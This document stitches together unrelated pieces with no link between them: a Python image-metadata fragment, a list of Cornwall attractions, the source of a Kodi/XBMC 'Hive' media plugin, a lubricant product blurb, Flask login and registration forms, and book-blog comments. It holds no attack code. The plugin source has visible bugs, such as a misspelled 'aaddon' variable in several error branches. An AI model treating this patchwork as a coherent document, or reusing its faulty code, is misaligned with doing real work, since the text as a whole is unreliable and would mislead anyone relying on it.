metadata_for_synthetic(context): return zeit.content.image.interfaces.IImageMetadata(context.__parent__) class XMLReferenceUpdater(zeit.cms.content.xmlsupport.XMLReferenceUpdater): target_iface = zeit.content.image.interfaces.IImageMetadata def update_with_context(self, entry, context): def set_attribute(name, value): if value: entry.set(name, value) else: entry.attrib.pop(name, None) set_attribute('origin', context.origin) set_attribute('title', context.title) set_attribute('alt', context.alt) # XXX This is really ugly: XMLReference type 'related' uses href for # the uniqueId, but type 'image' uses 'src' or 'base-id' instead, and # reuses 'href' for the link information. And since XMLReferenceUpdater # is called for all types of reference, we need to handle both ways. if entry.get('src') or entry.get('base-id'): set_attribute('href', context.links_to) if context.nofollow: set_attribute('rel', 'nofollow') entry['bu'] = context.caption or None for child in entry.iterchildren('copyright'): entry.remove(child) if context.copyright is None: return text, company, freetext, link, nofollow = context.copyright node = lxml.objectify.E.copyright(text) if link: node.set('link', link) if nofollow: node.set('rel', 'nofollow') entry.append(node)
Most spots are open year round, but do check before you head out. Crealy Adventure Park has thrill rides, hundreds of animals, 40,000 sq ft of indoor play and 35 acres of outdoor play. Healey’s Cyder Farm is family friendly and open all year. Cardinham Wood is mixed woodland for walkers and cyclists, with a great cafe. Bodmin & Wenford Railway, Cornwall’s steam railway. You can hop between Padstow and Rock on the ferry. Eating places abound on both sides of the estuary. A bit further afield you can follow the Fal from Truro to Falmouth or St Mawes and back. St Ives has terrible parking which has been solved by a great park & ride system on the St Ives Branch Line. You can then reach the Tate and Barbara Hepworth’s house and studio in St Ives. Kayaking, canoeing and SUPing around magical Fowey estuary with trips from Golant or Fowey harbour . Jump Off a Cliff at the Adrenalin Quarry! The latest mountain biking news from nearby Grogley Woods. And even more bike trails all around us. You’ll see octopi, sharks and seahorses along with loads of fish at the Blue Reef Aquarium. Always something happening at Newquay Zoo, including big cats, a Madagascan walkthrough and penguins. The Monkey Sanctuary has been caring for unwanted and rescued monkeys for 45 years. Cornish Birds of Prey is close by, and in the other direction you’ll find the Screech Owl Sanctuary and Wildlife Park. You can adopt a lobster – or not – at the National Lobster Hatchery in Padstow. A bit further toward Devon is the Tamar Otter Sanctuary. Cornwall is buzzing at the Porteath Bee Centre. Just over half an hour away is the Porfell Wildlife Park & Sanctuary, established 25 years. Sharp’s Brewery has a shop at Rock. St Austell Brewery has tours, plus the Hicks Bar, museum and brewery shop and is 25 minutes away. Other websites for fun, interesting, adventurous things to do – Rain or Shine! www.101-things-to-do-on-a-rainy-day-in-cornwall.co.uk. Lots of ideas for a great day – out of the rain. www.whatsoncornwall.co.uk. Entertainment, Festivals, Sport, and more.
''' Hive for XBMC Plugin Copyright (C) 2013-2014 ddurdle This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. ''' import xbmc, xbmcgui, xbmcplugin, xbmcaddon import sys import urllib import cgi import re import xbmcvfs # global variables PLUGIN_NAME = 'hive' #helper methods def log(msg, err=False): if err: xbmc.log(addon.getAddonInfo('name') + ': ' + msg, xbmc.LOGERROR) else: xbmc.log(addon.getAddonInfo('name') + ': ' + msg, xbmc.LOGDEBUG) def parse_query(query): queries = cgi.parse_qs(query) q = {} for key, value in queries.items(): q[key] = value[0] q['mode'] = q.get('mode', 'main') return q def addMediaFile(service, package): listitem = xbmcgui.ListItem(package.file.displayTitle(), iconImage=package.file.thumbnail, thumbnailImage=package.file.thumbnail) if package.file.type == package.file.AUDIO: if package.file.hasMeta: infolabels = decode_dict({ 'title' : package.file.displayTitle(), 'tracknumber' : package.file.trackNumber, 'artist': package.file.artist, 'album': package.file.album,'genre': package.file.genre,'premiered': package.file.releaseDate, 'date' : package.file.date, 'size' : package.file.size}) else: infolabels = decode_dict({ 'title' : package.file.displayTitle(), 'date' : package.file.date, 'size' : package.file.size }) listitem.setInfo('Music', infolabels) playbackURL = '?mode=audio' elif package.file.type == package.file.VIDEO: infolabels = decode_dict({ 'title' : package.file.displayTitle() , 'plot' : package.file.plot, 'date' : package.file.date, 'size' : package.file.size }) listitem.setInfo('Video', infolabels) playbackURL = '?mode=video' elif package.file.type == package.file.PICTURE: infolabels = decode_dict({ 'title' : package.file.displayTitle() , 'plot' : package.file.plot, 'date' : package.file.date, 'size' : package.file.size }) listitem.setInfo('Pictures', infolabels) playbackURL = '?mode=photo' else: infolabels = decode_dict({ 'title' : package.file.displayTitle() , 'plot' : package.file.plot }) listitem.setInfo('Video', infolabels) playbackURL = '?mode=video' listitem.setProperty('IsPlayable', 'true') listitem.setProperty('fanart_image', package.file.fanart) cm=[] try: url = package.getMediaURL() cleanURL = re.sub('---', '', url) cleanURL = re.sub('&', '---', cleanURL) except: cleanURL = '' # url = PLUGIN_URL+'?mode=streamurl&title='+package.file.title+'&url='+cleanURL url = PLUGIN_URL+playbackURL+'&instance='+str(service.instanceName)+'&title='+package.file.title+'&filename='+package.file.id if package.file.isEncoded == False: cm.append(( addon.getLocalizedString(30086), 'XBMC.RunPlugin('+PLUGIN_URL+'?mode=requestencoding&instance='+str(service.instanceName)+'&title='+package.file.title+'&filename='+package.file.id+')', )) cm.append(( addon.getLocalizedString(30042), 'XBMC.RunPlugin('+PLUGIN_URL+'?mode=buildstrm&username='+str(service.authorization.username)+'&title='+package.file.title+'&filename='+package.file.id+')', )) # cm.append(( addon.getLocalizedString(30046), 'XBMC.PlayMedia('+playbackURL+'&title='+ package.file.title + '&directory='+ package.folder.id + '&filename='+ package.file.id +'&playback=0)', )) # cm.append(( addon.getLocalizedString(30047), 'XBMC.PlayMedia('+playbackURL+'&title='+ package.file.title + '&directory='+ package.folder.id + '&filename='+ package.file.id +'&playback=1)', )) # cm.append(( addon.getLocalizedString(30048), 'XBMC.PlayMedia('+playbackURL+'&title='+ package.file.title + '&directory='+ package.folder.id + '&filename='+ package.file.id +'&playback=2)', )) #cm.append(( addon.getLocalizedString(30032), 'XBMC.RunPlugin('+PLUGIN_URL+'?mode=download&title='+package.file.title+'&filename='+package.file.id+')', )) # listitem.addContextMenuItems( commands ) # if cm: listitem.addContextMenuItems(cm, False) xbmcplugin.addDirectoryItem(plugin_handle, url, listitem, isFolder=False, totalItems=0) def addDirectory(service, folder): if folder.id == 'SAVED-SEARCH': listitem = xbmcgui.ListItem('Search - ' + decode(folder.displayTitle()), iconImage='', thumbnailImage='') else: listitem = xbmcgui.ListItem(decode(folder.displayTitle()), iconImage=decode(folder.thumb), thumbnailImage=decode(folder.thumb)) fanart = addon.getAddonInfo('path') + '/fanart.jpg' if folder.id != '': cm=[] cm.append(( addon.getLocalizedString(30042), 'XBMC.RunPlugin('+PLUGIN_URL+'?mode=buildstrm&title='+folder.title+'&username='+str(service.authorization.username)+'&folderID='+str(folder.id)+')', )) cm.append(( addon.getLocalizedString(30081), 'XBMC.RunPlugin('+PLUGIN_URL+'?mode=createbookmark&title='+folder.title+'&instance='+str(service.instanceName)+'&folderID='+str(folder.id)+')', )) listitem.addContextMenuItems(cm, False) listitem.setProperty('fanart_image', fanart) if folder.id == 'SAVED-SEARCH': xbmcplugin.addDirectoryItem(plugin_handle, PLUGIN_URL+'?mode=search&instance='+str(service.instanceName)+'&criteria='+folder.title, listitem, isFolder=True, totalItems=0) else: xbmcplugin.addDirectoryItem(plugin_handle, service.getDirectoryCall(folder), listitem, isFolder=True, totalItems=0) def addMenu(url,title): listitem = xbmcgui.ListItem(decode(title), iconImage='', thumbnailImage='') fanart = addon.getAddonInfo('path') + '/fanart.jpg' listitem.setProperty('fanart_image', fanart) xbmcplugin.addDirectoryItem(plugin_handle, url, listitem, isFolder=True, totalItems=0) #http://stackoverflow.com/questions/1208916/decoding-html-entities-with-python/1208931#1208931 def _callback(matches): id = matches.group(1) try: return unichr(int(id)) except: return id def decode(data): return re.sub("&#(\d+)(;|(?=\s))", _callback, data).strip() def decode_dict(data): for k, v in data.items(): if type(v) is str or type(v) is unicode: data[k] = decode(v) return data def numberOfAccounts(accountType): count = 1 max_count = int(addon.getSetting(accountType+'_numaccounts')) actualCount = 0 while True: try: if addon.getSetting(accountType+str(count)+'_username') != '': actualCount = actualCount + 1 except: break if count == max_count: break count = count + 1 return actualCount #global variables PLUGIN_URL = sys.argv[0] plugin_handle = int(sys.argv[1]) plugin_queries = parse_query(sys.argv[2][1:]) addon = xbmcaddon.Addon(id='plugin.video.hive') addon_dir = xbmc.translatePath( addon.getAddonInfo('path') ) import os sys.path.append(os.path.join( addon_dir, 'resources', 'lib' ) ) import hive import cloudservice import folder import file import package import mediaurl import authorization #from resources.lib import gPlayer #from resources.lib import tvWindow #debugging try: remote_debugger = addon.getSetting('remote_debugger') remote_debugger_host = addon.getSetting('remote_debugger_host') # append pydev remote debugger if remote_debugger == 'true': # Make pydev debugger works for auto reload. # Note pydevd module need to be copied in XBMC\system\python\Lib\pysrc import pysrc.pydevd as pydevd # stdoutToServer and stderrToServer redirect stdout and stderr to eclipse console pydevd.settrace(remote_debugger_host, stdoutToServer=True, stderrToServer=True) except ImportError: log(addon.getLocalizedString(30016), True) sys.exit(1) except : pass # retrieve settings user_agent = addon.getSetting('user_agent') mode = plugin_queries['mode'] # make mode case-insensitive mode = mode.lower() log('plugin url: ' + PLUGIN_URL) log('plugin queries: ' + str(plugin_queries)) log('plugin handle: ' + str(plugin_handle)) instanceName = '' try: instanceName = (plugin_queries['instance']).lower() except: pass xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_LABEL) xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_DATE) xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_SIZE) #* utilities * #clear the authorization token(s) from the identified instanceName or all instances if mode == 'clearauth': if instanceName != '': try: addon.setSetting(instanceName + '_token', '') xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30023)) except: #error: instance doesn't exist pass # clear all accounts else: count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) while True: instanceName = PLUGIN_NAME+str(count) try: addon.setSetting(instanceName + '_token', '') except: break if count == max_count: break count = count + 1 xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30023)) xbmcplugin.endOfDirectory(plugin_handle) #create strm files elif mode == 'buildstrm': silent = 0 try: silent = int(addon.getSetting('strm_silent')) except: silent = 0 try: silent = int(plugin_queries['silent']) except: pass path = '' try: path = int(plugin_queries['path']) except: pass try: path = str(addon.getSetting('strm_path')) except: pass if path == '': path = xbmcgui.Dialog().browse(0,addon.getLocalizedString(30026), 'files','',False,False,'') addon.setSetting('strm_path', path) if path != '': if silent == 0: returnPrompt = xbmcgui.Dialog().yesno(addon.getLocalizedString(30000), addon.getLocalizedString(30027) + '\n'+path + '?') else: returnPrompt = True if path != '' and returnPrompt: if silent != 2: try: pDialog = xbmcgui.DialogProgressBG() pDialog.create(addon.getLocalizedString(30000), 'Building STRMs...') except: pass try: url = plugin_queries['streamurl'] title = plugin_queries['title'] url = re.sub('---', '&', url) except: url='' if url != '': filename = path + '/' + title+'.strm' strmFile = xbmcvfs.File(filename, "w") strmFile.write(url+'\n') strmFile.close() else: try: folderID = plugin_queries['folderID'] title = plugin_queries['title'] except: folderID = '' try: filename = plugin_queries['filename'] title = plugin_queries['title'] except: filename = '' try: invokedUsername = plugin_queries['username'] except: invokedUsername = '' if folderID != '': count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) loop = True while loop: instanceName = PLUGIN_NAME+str(count) try: username = addon.getSetting(instanceName+'_username') if username == invokedUsername: #let's log in service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) loop = False except: break if count == max_count: #fallback on first defined account service = hive.hive(PLUGIN_URL,addon,PLUGIN_NAME+'1', user_agent) break count = count + 1 service.buildSTRM(path + '/'+title,folderID) elif filename != '': url = PLUGIN_URL+'?mode=video&title='+title+'&filename='+filename + '&username='+invokedUsername # filename = xbmc.translatePath(os.path.join(path, title+'.strm')) filename = path + '/' + title+'.strm' strmFile = xbmcvfs.File(filename, "w") strmFile.write(url+'\n') strmFile.close() else: count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) while True: instanceName = PLUGIN_NAME+str(count) try: username = addon.getSetting(instanceName+'_username') except: username = '' if username != '': service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) service.buildSTRM(path + '/'+username) if count == max_count: #fallback on first defined account service = hive.hive(PLUGIN_URL,addon,PLUGIN_NAME+'1', user_agent) break count = count + 1 if silent != 2: try: pDialog.update(100) except: pass if silent == 0: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30028)) xbmcplugin.endOfDirectory(plugin_handle) #create strm files elif mode == 'createbookmark': try: folderID = plugin_queries['folderID'] title = plugin_queries['title'] instanceName = plugin_queries['instance'] except: folderID = '' if folderID != '': try: username = addon.getSetting(instanceName+'_username') except: username = '' if username != '': service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) newTitle = '' try: dialog = xbmcgui.Dialog() newTitle = dialog.input('Enter a name for the bookmark', title, type=xbmcgui.INPUT_ALPHANUM) except: newTitle = title if newTitle == '': newTitle = title service.createBookmark(folderID,newTitle) xbmcplugin.endOfDirectory(plugin_handle) #create strm files elif mode == 'createsearch': searchText = '' try: searchText = addon.getSetting('criteria') except: searchText = '' if searchText == '': try: dialog = xbmcgui.Dialog() searchText = dialog.input('Enter search string', type=xbmcgui.INPUT_ALPHANUM) except: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30100)) searchText = 'life' if searchText != '': instanceName = '' try: instanceName = (plugin_queries['instance']).lower() except: pass numberOfAccounts = numberOfAccounts(PLUGIN_NAME) # show list of services if numberOfAccounts > 1 and instanceName == '': count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) while True: instanceName = PLUGIN_NAME+str(count) try: username = addon.getSetting(instanceName+'_username') if username != '': addMenu(PLUGIN_URL+'?mode=main&instance='+instanceName,username) except: break if count == max_count: #fallback on first defined account service = hive.hive(PLUGIN_URL,addon,PLUGIN_NAME+'1', user_agent) break count = count + 1 else: # show index of accounts if instanceName == '' and numberOfAccounts == 1: count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) loop = True while loop: instanceName = PLUGIN_NAME+str(count) try: username = addon.getSetting(instanceName+'_username') if username != '': #let's log in service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) loop = False except: break if count == max_count: #fallback on first defined account service = hive.hive(PLUGIN_URL,addon,PLUGIN_NAME+'1', user_agent) break count = count + 1 # no accounts defined elif numberOfAccounts == 0: #legacy account conversion try: username = addon.getSetting('username') if username != '': addon.setSetting(PLUGIN_NAME+'1_username', username) addon.setSetting(PLUGIN_NAME+'1_password', addon.getSetting('password')) addon.setSetting(PLUGIN_NAME+'1_auth_token', addon.getSetting('auth_token')) addon.setSetting(PLUGIN_NAME+'1_auth_session', addon.getSetting('auth_session')) addon.setSetting('username', '') addon.setSetting('password', '') addon.setSetting('auth_token', '') addon.setSetting('auth_session', '') else: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30015)) log(addon.getLocalizedString(30015), True) xbmcplugin.endOfDirectory(plugin_handle) except : xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30015)) log(addon.getLocalizedString(30015), True) xbmcplugin.endOfDirectory(plugin_handle) #let's log in service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) # show entries of a single account (such as folder) elif instanceName != '': service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) try: service except NameError: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30051), addon.getLocalizedString(30052), addon.getLocalizedString(30053)) log(addon.getLocalizedString(30050)+ 'hive-login', True) xbmcplugin.endOfDirectory(plugin_handle) service.createSearch(searchText) mediaItems = service.getSearchResults(searchText) if mediaItems: for item in mediaItems: try: if item.file is None: addDirectory(service, item.folder) else: addMediaFile(service, item) except: addMediaFile(service, item) service.updateAuthorization(addon) xbmcplugin.endOfDirectory(plugin_handle) numberOfAccounts = numberOfAccounts(PLUGIN_NAME) try: invokedUsername = plugin_queries['username'] except: invokedUsername = '' # show list of services if numberOfAccounts > 1 and instanceName == '' and invokedUsername == '': if mode == 'main': mode = '' count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) while True: instanceName = PLUGIN_NAME+str(count) try: username = addon.getSetting(instanceName+'_username') if username != '': addMenu(PLUGIN_URL+'?mode=main&instance='+instanceName,username) try: service except: service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) except: break if count == max_count: #fallback on first defined account service = hive.hive(PLUGIN_URL,addon,PLUGIN_NAME+'1', user_agent) break count = count + 1 else: # show index of accounts if instanceName == '' and invokedUsername == '' and numberOfAccounts == 1: count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) loop = True while loop: instanceName = PLUGIN_NAME+str(count) try: username = addon.getSetting(instanceName+'_username') if username != '': #let's log in service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) loop = False except: break if count == max_count: #fallback on first defined account service = hive.hive(PLUGIN_URL,addon,PLUGIN_NAME+'1', user_agent) break count = count + 1 # no accounts defined elif numberOfAccounts == 0: #legacy account conversion try: username = addon.getSetting('username') if username != '': addon.setSetting(PLUGIN_NAME+'1_username', username) addon.setSetting(PLUGIN_NAME+'1_password', addon.getSetting('password')) addon.setSetting(PLUGIN_NAME+'1_auth_token', addon.getSetting('auth_token')) addon.setSetting(PLUGIN_NAME+'1_auth_session', addon.getSetting('auth_session')) addon.setSetting('username', '') addon.setSetting('password', '') addon.setSetting('auth_token', '') addon.setSetting('auth_session', '') else: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30015)) log(addon.getLocalizedString(30015), True) xbmcplugin.endOfDirectory(plugin_handle) except : xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30015)) log(addon.getLocalizedString(30015), True) xbmcplugin.endOfDirectory(plugin_handle) #let's log in service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) # show entries of a single account (such as folder) elif instanceName != '': service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) elif invokedUsername != '': count = 1 max_count = int(addon.getSetting(PLUGIN_NAME+'_numaccounts')) loop = True while loop: instanceName = PLUGIN_NAME+str(count) try: username = addon.getSetting(instanceName+'_username') if username == invokedUsername: #let's log in service = hive.hive(PLUGIN_URL,addon,instanceName, user_agent) loop = False except: break if count == max_count: #fallback on first defined account service = hive.hive(PLUGIN_URL,addon,PLUGIN_NAME+'1', user_agent) break count = count + 1 if mode == 'main': addMenu(PLUGIN_URL+'?mode=options','<< '+addon.getLocalizedString(30043)+' >>') addMenu(PLUGIN_URL+'?mode=search','<<SEARCH>>') #dump a list of videos available to play if mode == 'main' or mode == 'folder': folderName='' if (mode == 'folder'): folderName = plugin_queries['directory'] else: pass try: service except NameError: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30051), addon.getLocalizedString(30052), addon.getLocalizedString(30053)) log(addon.getLocalizedString(30050)+ 'hive-login', True) xbmcplugin.endOfDirectory(plugin_handle) if folderName == '': addMenu(PLUGIN_URL+'?mode=folder&instance='+instanceName+'&directory=FRIENDS','['+addon.getLocalizedString(30091)+']') addMenu(PLUGIN_URL+'?mode=folder&instance='+instanceName+'&directory=FEED','['+addon.getLocalizedString(30092)+']') mediaItems = service.getCollections() if mediaItems: for item in mediaItems: try: if item.file is None: addDirectory(service, item.folder) else: addMediaFile(service, item) except: addMediaFile(service, item) mediaItems = service.getMediaList(folderName,0) if mediaItems: for item in mediaItems: try: if item.file is None: addDirectory(service, item.folder) else: addMediaFile(service, item) except: addMediaFile(service, item) service.updateAuthorization(addon) #dump a list of videos available to play elif mode == 'search': searchText = '' try: searchText = plugin_queries['criteria'] except: searchText = '' if searchText == '': try: dialog = xbmcgui.Dialog() searchText = dialog.input('Enter search string', type=xbmcgui.INPUT_ALPHANUM) except: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30100)) searchText = 'life' try: service except NameError: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30051), addon.getLocalizedString(30052), addon.getLocalizedString(30053)) log(addon.getLocalizedString(30050)+ 'hive-login', True) xbmcplugin.endOfDirectory(plugin_handle) mediaItems = service.getSearchResults(searchText) if mediaItems: for item in mediaItems: try: if item.file is None: addDirectory(service, item.folder) else: addMediaFile(service, item) except: addMediaFile(service, item) service.updateAuthorization(addon) # xbmcplugin.setContent(int(sys.argv[1]), 'videos') # xbmcplugin.setProperty(int(sys.argv[1]),'IsPlayable', 'false') # xbmc.executebuiltin("ActivateWindow(Videos)") #play a video given its exact-title elif mode == 'video' or mode == 'audio': filename = plugin_queries['filename'] try: directory = plugin_queries['directory'] except: directory = '' try: title = plugin_queries['title'] except: title = '' try: service except NameError: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30051), addon.getLocalizedString(30052), addon.getLocalizedString(30053)) log(aaddon.getLocalizedString(30050)+ 'hive-login', True) xbmcplugin.endOfDirectory(plugin_handle) playbackType = 0 try: playbackType = plugin_queries['playback'] except: playbackType = '' if service.isPremium: try: if mode == 'audio': playbackType = int(addon.getSetting('playback_type_audio')) else: playbackType = int(addon.getSetting('playback_type_video')) except: playbackType = 0 else: try: if mode == 'audio': playbackType = int(addon.getSetting('free_playback_type_audio')) else: playbackType = int(addon.getSetting('free_playback_type_video')) except: if mode == 'audio': playbackType = 0 else: playbackType = 1 mediaFile = file.file(filename, title, '', 0, '','') mediaFolder = folder.folder(directory,directory) mediaURLs = service.getPlaybackCall(playbackType,package.package(mediaFile,mediaFolder )) playbackURL = '' # BEGIN JoKeRzBoX # - Get list of possible resolutions (quality), pre-ordered from best to lower res, from a String constant # - Create associative array (a.k.a. hash list) availableQualities with each available resolution (key) and media URL (value) # - Simple algorithm to go through possible resolutions and find the best available one based on user's choice # FIX: list of qualities shown to user are now ordered from highest to low resolution if mode == 'audio': possibleQualities = addon.getLocalizedString(30058) else: possibleQualities = addon.getLocalizedString(30057) listPossibleQualities = possibleQualities.split("|") availableQualities = {} for mediaURL in mediaURLs: availableQualities[mediaURL.qualityDesc] = mediaURL.url ## User has chosen: "Always original quality" #if playbackType == 0: # playbackURL = availableQualities['original'] # User has chosen a max quality other than "original". Let's decide on the best stream option available #else: userChosenQuality = listPossibleQualities[playbackType] reachedThreshold = 0 for quality in listPossibleQualities: if quality == userChosenQuality: reachedThreshold = 1 if reachedThreshold and quality in availableQualities: playbackURL = availableQualities[quality] chosenRes = str(quality) reachedThreshold = 0 if reachedThreshold and playbackType != len(listPossibleQualities)-1 and len(availableQualities) == 3: # Means that the exact encoding requested by user was not found. # Also, there are the only available: original, 360p and 240p (because cont = 3). # Therefore if user did not choose "always ask" it is safe to assume "original" is the one closest to the quality selected by user playbackURL = availableQualities['original'] # Desired quality still not found. Lets bring list of available options and let user select if playbackURL == '': options = [] for quality in listPossibleQualities: if quality in availableQualities: options.append(quality) ret = xbmcgui.Dialog().select(addon.getLocalizedString(30033), options) if ret >= 0: playbackURL = availableQualities[str(options[ret])] chosenRes = str(options[ret]) # END JoKeRzBoX # JoKeRzBox: FIX: when user does not choose from list, addon was still playing a stream if playbackURL != '': item = xbmcgui.ListItem(path=playbackURL) # item.setInfo( type="Video", infoLabels={ "Title": title , "Plot" : title } ) # item.setInfo( type="Video") # Add resolution to beginning of title while playing media. Format "<RES> | <TITLE>" if mode == 'audio': item.setInfo( type="music", infoLabels={ "Title": title + " @ " + chosenRes} ) else: item.setInfo( type="video", infoLabels={ "Title": title + " @ " + chosenRes, "Plot" : title } ) xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item) #play a video given its exact-title elif mode == 'requestencoding': filename = plugin_queries['filename'] try: directory = plugin_queries['directory'] except: directory = '' try: title = plugin_queries['title'] except: title = '' try: service except NameError: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30051), addon.getLocalizedString(30052), addon.getLocalizedString(30053)) log(aaddon.getLocalizedString(30050)+ 'hive-login', True) xbmcplugin.endOfDirectory(plugin_handle) mediaFile = file.file(filename, title, '', 0, '','') mediaFolder = folder.folder(directory,directory) mediaURLs = service.getPlaybackCall(0,package.package(mediaFile,mediaFolder )) xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30087), title) elif mode == 'photo': filename = plugin_queries['filename'] try: directory = plugin_queries['directory'] except: directory = '' try: title = plugin_queries['title'] except: title = '' try: service except NameError: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30051), addon.getLocalizedString(30052), addon.getLocalizedString(30053)) log(aaddon.getLocalizedString(30050)+ 'hive-login', True) xbmcplugin.endOfDirectory(plugin_handle) path = '' try: path = addon.getSetting('photo_folder') except: pass import os.path if not os.path.exists(path): path = '' while path == '': path = xbmcgui.Dialog().browse(0,addon.getLocalizedString(30038), 'files','',False,False,'') if not os.path.exists(path): path = '' else: addon.setSetting('photo_folder', path) mediaFile = file.file(filename, title, '', 0, '','') mediaFolder = folder.folder(directory,directory) mediaURLs = service.getPlaybackCall(0,package.package(mediaFile,mediaFolder )) playbackURL = '' for mediaURL in mediaURLs: if mediaURL.qualityDesc == 'original': playbackURL = mediaURL.url import xbmcvfs xbmcvfs.mkdir(path + '/'+str(directory)) try: xbmcvfs.rmdir(path + '/'+str(directory)+'/'+str(title)) except: pass service.downloadPicture(playbackURL, path + '/'+str(directory) + '/'+str(title)) xbmc.executebuiltin("XBMC.ShowPicture("+path + '/'+str(directory) + '/'+str(title)+")") #play a video given its exact-title elif mode == 'streamurl': url = plugin_queries['url'] try: title = plugin_queries['title'] except: title = '' try: service except NameError: xbmcgui.Dialog().ok(addon.getLocalizedString(30000), addon.getLocalizedString(30051), addon.getLocalizedString(30052), addon.getLocalizedString(30053)) log(aaddon.getLocalizedString(30050)+ 'hive-login', True) xbmcplugin.endOfDirectory(plugin_handle) url = re.sub('---', '&', url) item = xbmcgui.ListItem(path=url) item.setInfo( type="Video", infoLabels={ "Title": title , "Plot" : title } ) # item.setInfo( type="Music", infoLabels={ "Title": title , "Plot" : title } ) xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item) if mode == 'options' or mode == 'buildstrm' or mode == 'clearauth': addMenu(PLUGIN_URL+'?mode=clearauth','<<'+addon.getLocalizedString(30018)+'>>') addMenu(PLUGIN_URL+'?mode=buildstrm','<<'+addon.getLocalizedString(30025)+'>>') addMenu(PLUGIN_URL+'?mode=createsearch','<<Save Search>>') xbmcplugin.endOfDirectory(plugin_handle)
TOTAL MARTOL LVG 15 CF is a Pressing oil evanescent fluid. This original formulation takes into account the need to improve working conditions and additional convenience for users. Lubricity, anti-wear and extreme-pressure doping give improved tool edge retention and extremely good surface finish – factors which all contribute towards reduced production costs. We have formulated chlorine-free products in response to the need to protect the environment and the requirements of certain industries. Residue < 0.05 % by mass after passage through stove at 200°C for two hours. Does not leave marks on aluminium. This oil offers performance completely comparable to that obtained using an equivalent chlorinated product that has the advantage of not causing pollution as well as less expensive disposal. This oil contains selected petroleum bases and additives designed to guarantee: – residue < 0.05 % by mass, – excellent wettability on aluminium, – no marks on aluminium during heat treatment of aluminium, – product does not contain chlorine.
from flask.ext.wtf import Form # from flask.ext.wtf.file import FileField, FileRequired, FileAllowed from wtforms import TextField, PasswordField, validators from app import db from models import User, Locator #---------------------------------------------------------------------------- class LoginForm(Form): email = TextField('Email', [validators.Required()]) password = PasswordField('Password', [validators.Required()]) def validate_email(self, field): user = self.get_user() if user is None: raise validators.ValidationError('Invalid user.') if not user.check_password(password=self.password.data): raise validators.ValidationError('Invalid password.') def get_user(self): return db.session.query(User). \ filter_by(email=self.email.data).first() #---------------------------------------------------------------------------- class RegistrationForm(Form): email = TextField('Email Address', [validators.Required(), validators.Email()]) password = PasswordField('Password', [validators.Required()]) confirm = PasswordField('Repeat Password', [validators.Required(), validators.EqualTo('password', message='Passwords must match.')]) def validate_email(self, field): if db.session.query(User). \ filter_by(email=self.email.data).count() > 0: raise validators.ValidationError('Duplicate email.') #---------------------------------------------------------------------------- class EditForm(Form): title = TextField('title', [validators.Required()]) url = TextField('url', [validators.Required()]) groupname = TextField('groupname') #---------------------------------------------------------------------------- class SearchForm(Form): search = TextField('search', [validators.Required()]) #---------------------------------------------------------------------------- class RestorePasswordForm(Form): email = TextField('Email Address', [validators.Required()]) def validate_email(self, field): if not db.session.query(User).filter_by(email=self.email.data).count(): raise validators.ValidationError('Enter registered email.')
Looks like March is off to a great start so far! There's even one from my favorite authors list down there (Bridget Blackwood - sooooo good). I am really excited for wicked dark dragon, and wicked my love. Looks like we are getting some great releases in march. Thanks for sharing. Its always fun to see what it coming out that I need to grab up as soon as they are released. Putting this together gets me in trouble sometimes. Waaay to much good stuff out there!
